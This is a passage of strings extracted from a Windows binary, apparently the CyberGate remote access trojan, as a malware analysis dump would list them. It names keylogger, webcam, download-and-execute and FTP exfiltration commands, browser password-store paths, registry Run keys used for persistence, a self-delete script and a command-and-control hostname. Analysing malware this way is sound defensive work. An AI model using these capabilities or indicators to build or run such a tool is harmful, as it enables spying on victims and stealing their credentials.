irectoryW</pre><pre>InternetOpenUrlW</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoA</pre><pre>.idata</pre><pre>.rdata</pre><pre>P.reloc</pre><pre>P.rsrc</pre><pre>[E.MyFull</pre><pre>-!GA?EXE</pre><pre>LMsg</pre><pre>AVICAP32.DLL</pre><pre>crypt32.dll</pre><pre>gdi32.dll</pre><pre>gdiplus.dll</pre><pre>mpr.dll</pre><pre>msacm32.dll</pre><pre>powrprof.dll</pre><pre>pstorec.dll</pre><pre>URLMON.DLL</pre><pre>user32.dll</pre><pre>version.dll</pre><pre>wininet.dll</pre><pre>winmm.dll</pre><pre>wsock32.dll</pre><pre>HKEY_CLASSES_ROOT</pre><pre>HKEY_CURRENT_USER</pre><pre>HKEY_LOCAL_MACHINE</pre><pre>HKEY_USERS</pre><pre>HKEY_CURRENT_CONFIG</pre><pre>Portugal</pre><pre>Turkey</pre><pre>WEBCAM</pre><pre>*<>#%"{}|\^[]`</pre><pre>uploadandexecute</pre><pre>uploadandexecuteyes|</pre><pre>uploadandexecuteno|</pre><pre>webcam|webcamstream|</pre><pre>webcam|webcamstop|</pre><pre>webcamstart</pre><pre>[Execute]</pre><pre>KeyDelBackspace</pre><pre>CyberGateKeylogger</pre><pre>software\microsoft\windows\currentversion\uninstall\</pre><pre>Invalid Key Name</pre><pre>Invalid KeyName</pre><pre>%Username%</pre><pre>%Country%</pre><pre>Úte%</pre><pre>FirstExecution</pre><pre>keylogger|keyloggeronlinekey|</pre><pre>keylogger|keyloggerativar|T|</pre><pre>keylogger|keyloggerativar|F|</pre><pre>webcamlist|</pre><pre>webcam</pre><pre>filemanager|fmsendftpyes|</pre><pre>filemanager|fmsendftpno|</pre><pre>FIREFOX2|</pre><pre>FIREFOX8|</pre><pre>FIREFOX10|</pre><pre>FIREFOX15|</pre><pre>FIREFOX22|</pre><pre>\Opera\Opera\wand.dat</pre><pre>OPERA|</pre><pre>\Google\Chrome\User Data\Default\Login Data</pre><pre>CHROME|</pre><pre>\Google\Chrome\User Data\Default\Web Data</pre><pre>getpasswords</pre><pre>downexec</pre><pre>openweb</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\</pre><pre>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\</pre><pre>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\</pre><pre>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\</pre><pre>fmexecnormal</pre><pre>filemanager|fmexecnormal|</pre><pre>fmexechide</pre><pre>filemanager|fmexechide|</pre><pre>fmexecparam</pre><pre>filemanager|fmexecparam|F|</pre><pre>filemanager|fmexecparam|T|</pre><pre>fmsendftp</pre><pre>filemanager|fmsendftp|</pre><pre>listarportas</pre><pre>listarportas|listadeportasativas|</pre><pre>listarportasdns</pre><pre>listarportas|finalizarconexao|</pre><pre>finalizarprocessoportas</pre><pre>listarportas|finalizarprocessoportas|Y|</pre><pre>listarportas|finalizarprocessoportas|N|</pre><pre>tecaladoexecutar</pre><pre>webcamconfig</pre><pre>keylogger</pre><pre>keylogger|keyloggeronlinestart|</pre><pre>keylogger|keyloggeronlinestop|</pre><pre>keyloggerativar</pre><pre>keyloggerdesativar</pre><pre>keyloggerbaixar</pre><pre>keylogger|keyloggerbaixar|</pre><pre>keylogger|keyloggerbaixar|NOLOGS</pre><pre>keyloggerexcluir</pre><pre>keylogger|keyloggerexcluir|</pre><pre>keyloggeronlinestart</pre><pre>keyloggeronlinestop</pre><pre>chromepass</pre><pre>chromepass|</pre><pre>keysearch</pre><pre>keysearch|NO</pre><pre>keysearch|YES</pre><pre>sendkeyswindow</pre><pre>enviarlogskey</pre><pre>enviarlogskey|</pre><pre>rar.exe</pre><pre>rarreg.key</pre><pre>vs.vbs</pre><pre>bs.bat</pre><pre>memoryexecoperation</pre><pre>TeamViewer.exe</pre><pre>TeamViewer_Resource.dll</pre><pre>TV.dll</pre><pre>x.html</pre><pre>Windows 3.1</pre><pre>Windows 95 (Release 2)</pre><pre>Windows 95</pre><pre>Windows 98 SE</pre><pre>Windows 98</pre><pre>Windows ME</pre><pre>Windows 8</pre><pre>Windows 7</pre><pre>Windows Vista</pre><pre>Windows XP Professional x64</pre><pre>Windows XP Home</pre><pre>Windows XP Professional</pre><pre>Windows 2000 Professional</pre><pre>Windows 2008</pre><pre>Windows 2003 Server Datacenter</pre><pre>Windows 2003 Server Enterprise</pre><pre>Windows 2003 Server Web Edition</pre><pre>Windows 2003 Server</pre><pre>Windows Home Server</pre><pre>Windows 2003 Server (Release 2)</pre><pre>Windows 2000 Server Datacenter</pre><pre>Windows 2000 Server Enterprise</pre><pre>Windows 2000 Server Web Edition</pre><pre>Windows 2000 Server</pre><pre>Windows NT 4.0 Server Datacenter</pre><pre>Windows NT 4.0 Server Enterprise</pre><pre>Windows NT 4.0 Server Web Edition</pre><pre>Windows NT 4.0 Server</pre><pre>SelfDelete.bat</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>Software\Microsoft\Windows NT\CurrentVersion\Windows</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>explorer.exe</pre><pre>\Microsoft\Windows\</pre><pre>CYBERGATEPASS</pre><pre>lala25.no-ip.biz</pre><pre>C:\User</pre><pre>InstallDir.exe</pre><pre>ÞFAULTBROWSER%</pre><pre>2.5.2.0</pre><pre>ftp.ftpserver.com</pre><pre>ftpuser</pre><pre>ftppass</pre><pre>Then set URL here.</pre><pre>calc.exe</pre><pre>notepad.exe</pre><pre>lsass.exe</pre><pre>explorer.exe</pre><pre>svchost.exe</pre><pre>http://www.somehosting.com/tagger.php</pre><pre>::{21EC2020-3AEA-1069-A2DD-08002B30309D}\::{2227A280-3AEA-1069-A2DE-08002B30309D}</pre><pre>::{031E4825-7B94-4dc3-B131-E946B44C8DD5}\{491E922F-5643-4af4-A7EB-4E7A138D8174}</pre><pre>::{59031a4?id=%ID%&name=%Username% @ %PCName%&version=%Version%</pre><pre>example@email.com</pre><pre>No help keyword specified.</pre><pre>No help found for %s#No context-sensitive help installed$No topic-based help system installed</pre><pre>Alt Clipboard does not support Icons/Menu '%s' is already being used by another form</pre><pre>Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window</pre><pre>OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters</pre><pre>Unsupported clipboard format</pre><pre>Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.</pre><pre>Reply Code is not valid: %s</pre><pre>Reply Code already exists: %s Thread must be specified for the scheduler.!You must have an OnExecute event.</pre><pre>Command not supported.</pre><pre>Address type not supported."%d: Circular links are not allowed"Not enough data in buffer. (%d/%d)</pre><pre>File "%s" not found</pre><pre>Object type not supported.</pre><pre>%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.</pre><pre>Set Size Exceeded.)UDP is not support in this SOCKS version.</pre><pre>Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.</pre><pre>Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)</pre><pre>Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.</pre><pre>Invalid Port Range (%d - %d)</pre><pre>%s is not a valid service.</pre><pre>"Operation not supported on socket.</pre><pre>Protocol family not supported.0Address family not supported by protocol family.</pre><pre>Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.</pre><pre>Operation would block.</pre><pre>Operation now in progress.</pre><pre>Operation already in progress.</pre><pre>Socket operation on non-socket.</pre><pre>Protocol not supported.</pre><pre>Socket type not supported.</pre><pre>Invalid destination array"Character index out of bounds (%d)</pre><pre>Start index out of bounds (%d)</pre><pre>Invalid count (%d)</pre><pre>Invalid destination index (%d)</pre><pre>Invalid codepage (%d)-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)</pre><pre>Resolving hostname %s.</pre><pre>Connecting to %s.</pre><pre>Socket Error # %d</pre><pre>List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream</pre><pre>Error reading %s%s%s: %s</pre><pre>Failed to get data for '%s'</pre><pre>Resource %s not found</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group</pre><pre>Property %s does not exist</pre><pre>Thread creation error: %s</pre><pre>Thread Error: %s (%d)</pre><pre>Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread</pre><pre>Class %s not found</pre><pre>A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file "%s". %s</pre><pre>Cannot open file "%s". %s</pre><pre>Invalid stream format$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s'</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Interface not supported</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>Invalid variant operation%Invalid variant operation (%s%.8x)</pre><pre>%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)</pre><pre>Operation not supported</pre><pre>External exception %x</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Operation aborted(Exception %s in module %s at %p.</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'"Variant method calls not supported</pre><pre>!'%s' is not a valid integer value('%s' is not a valid floating point value</pre><pre>I/O error %d</pre><pre>Integer overflow Invalid floating point operation</pre></pre></requestedExecutionLevel></pre></assemblyIdentity></pre></->